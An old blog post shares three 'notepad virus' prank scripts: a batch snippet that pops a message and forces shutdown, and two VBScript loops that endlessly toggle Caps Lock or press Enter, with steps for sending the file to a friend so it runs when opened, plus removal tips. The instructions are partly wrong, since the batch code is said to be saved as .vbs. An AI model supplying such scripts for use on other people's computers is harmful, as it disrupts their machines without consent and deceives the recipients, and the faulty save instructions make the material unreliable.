Rabu, 18 April 2012

computer script


i have a computer script, this is a kind of virus we can make with "notepad". Don't do that for a bad purpose. I just want to share what i get from my friend.

1. Forced Shutdown

@echo off
msg * I don't like you
shutdown -c "Error! BYE BYE" -s


save with extension .vbs with type all files
the effect is your computer will automatically shutdown


2. Caps Lock

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save with extension .vbs with type all files
the effect is the caps lock keyboard will continually on and can not be off although already turned off.


 3. Enter

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save with extension .vbs with type all files
the effect is the keyboard will press Enter button continually

How to use the script:
1. Copy and paste that script into notepad
2. Save file with type .vbs
3. Send that note to your friend's computer
4. If he open that script, he will get that virus on his/her laptop

How to make normal again:
1. Restart your computer
2. Click Ctrl+alt+del and then end all task

How to make the script off :
1. Right click on the right bottom of your monitor
2. select task manager or ctrl+alt+del
3. Select tab process, find file name wscript.exe and then click end process
4. Click end process again
5. Your computer will normal again

DON'T DO THAT FOR BAD PURPOSE !!

Tidak ada komentar:

Posting Komentar